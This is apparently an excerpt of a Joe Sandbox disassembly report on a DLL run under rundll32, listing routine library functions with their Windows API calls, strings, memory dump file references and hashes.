TerminateProcess.KERNEL32(00000000), ref: 10031D7D

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15

Uniqueness

Uniqueness Score: -1.00%

Function 10027958, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

GetKeyState.USER32 ref: 1002797E
GetKeyState.USER32 ref: 10027987
GetKeyState.USER32 ref: 10027990
SendMessageA.USER32 ref: 100279A6

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0

Uniqueness

Uniqueness Score: -1.00%

Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100214D5
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
ConvertDefaultLocale.KERNEL32(?), ref: 10021555
ConvertDefaultLocale.KERNEL32(?), ref: 10021563
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
EnumResourceLanguagesA.KERNEL32 ref: 100215EA
ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
_memset.LIBCMT ref: 10021689

Strings

GetSystemDefaultUILanguage, xrefs: 10021565
ntdll.dll, xrefs: 100215C8
kernel32.dll, xrefs: 100214EE
GetUserDefaultUILanguage, xrefs: 1002150D

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
__crt_waiting_on_module_handle.LIBCMT ref: 1003462D

Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671

GetProcAddress.KERNEL32(00000000,EncodePointer,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000), ref: 10034656
GetProcAddress.KERNEL32(00000000,DecodePointer,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000), ref: 10034666
__lock.LIBCMT ref: 10034688
InterlockedIncrement.KERNEL32(?), ref: 10034695
__lock.LIBCMT ref: 100346A9
___addlocaleref.LIBCMT ref: 100346C7

Strings

EncodePointer, xrefs: 1003464A
DecodePointer, xrefs: 1003465E
KERNEL32.DLL, xrefs: 1003461C, 10034621, 1003462C

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 10020C3F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC

Strings

ReleaseActCtx, xrefs: 10020C87
ActivateActCtx, xrefs: 10020C94
CreateActCtxA, xrefs: 10020C7F
KERNEL32, xrefs: 10020C63
DeactivateActCtx, xrefs: 10020CA1

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17

Uniqueness

Uniqueness Score: -1.00%

Function 10043A65, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043A6C
std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
int.LIBCPMT ref: 10043A8D

Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6

std::locale::_Getfacet.LIBCPMT ref: 10043A96
ctype.LIBCPMT ref: 10043AB0
std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
__CxxThrowException@8.LIBCMT ref: 10043AD2
std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8

Strings

bad cast, xrefs: 10043ABC

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 2535038987-3145022300
Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799

Uniqueness

Uniqueness Score: -1.00%

Function 10043C84, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043C8B
std::_Lockit::_Lockit.LIBCPMT ref: 10043C95
int.LIBCPMT ref: 10043CAC

Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6

std::locale::_Getfacet.LIBCPMT ref: 10043CB5
codecvt.LIBCPMT ref: 10043CCF
std::bad_exception::bad_exception.LIBCMT ref: 10043CE3
__CxxThrowException@8.LIBCMT ref: 10043CF1
std::locale::facet::_Incref.LIBCPMT ref: 10043D01
std::locale::facet::facet_Register.LIBCPMT ref: 10043D07

Strings

bad cast, xrefs: 10043CDB

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 577375395-3145022300
Opcode ID: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
Instruction ID: 1c641b6faa081a6f5f4558330d18bfb7172afe5efef557fc2d9691916cc6be6c
Opcode Fuzzy Hash: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
Instruction Fuzzy Hash: E701A979D002199BCB06DBA0DC42AAE7375FF84660FB14129F111FB1E1DF74AA008798

Uniqueness

Uniqueness Score: -1.00%

Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10023423
FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
LoadResource.KERNEL32(?,00000000), ref: 1002345E

Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C

LockResource.KERNEL32(?,00000024,1000150C,00000000,3F4813DC), ref: 1002346F
GetDesktopWindow.USER32 ref: 100234A2
IsWindowEnabled.USER32(?), ref: 100234B0
EnableWindow.USER32(?,00000000), ref: 100234BF

Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,3F4813DC), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,3F4813DC), ref: 100235D9

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10028C9F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10028CA6
GetPropA.USER32 ref: 10028CB5
CallWindowProcA.USER32 ref: 10028D0F

Part of subcall function 10027B1C: GetWindowRect.USER32 ref: 10027B46

SetWindowLongA.USER32 ref: 10028D36
RemovePropA.USER32 ref: 10028D3E
GlobalFindAtomA.KERNEL32 ref: 10028D45
GlobalDeleteAtom.KERNEL32 ref: 10028D4F
CallWindowProcA.USER32 ref: 10028DA3

Strings

AfxOldWndProc423, xrefs: 10028CAE, 10028CB3, 10028D3C, 10028D44

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
Instruction ID: ff35111d89a6fae3ee79e979b08ab4de06e021ef9fe06013c3cb9f10e1bb71d8
Opcode Fuzzy Hash: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
Instruction Fuzzy Hash: FB31843A80111ABBDF02DFA0EE49DBF7BB8FF46341F800519FA05A50A1C7759A14DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002B9A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 1002B9C8
GetStockObject.GDI32(0000000D), ref: 1002B9D0
GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
GetDC.USER32(00000000), ref: 1002B9EC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
ReleaseDC.USER32 ref: 1002BA18

Strings

System, xrefs: 1002B9C3, 1002BA2D

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 1001E7D5
SendMessageA.USER32 ref: 1001E7FB
SendMessageA.USER32 ref: 1001E815
SendMessageA.USER32 ref: 1001E839
SendMessageA.USER32 ref: 1001E86E
SendMessageA.USER32 ref: 1001E888
SendMessageA.USER32 ref: 1001E8A4
SendMessageA.USER32 ref: 1001E8BD
SendMessageA.USER32 ref: 1001E8DB

Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E5FA
Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E614

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 10001920, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10001982

Strings

ios_base::failbit set, xrefs: 10001A1E
ios_base::badbit set, xrefs: 100019A3
ios_base::eofbit set, xrefs: 10001A88

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002104C
lstrcmpA.KERNEL32(?,?), ref: 10021058
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
GlobalLock.KERNEL32 ref: 1002109C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1

Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1002A98E, Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 1002A99D
GetSystemMetrics.USER32 ref: 1002A9A4
GetSystemMetrics.USER32 ref: 1002A9AB
GetSystemMetrics.USER32 ref: 1002A9B5
GetDC.USER32(00000000), ref: 1002A9BF
GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
ReleaseDC.USER32 ref: 1002A9E0

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0

Uniqueness

Uniqueness Score: -1.00%

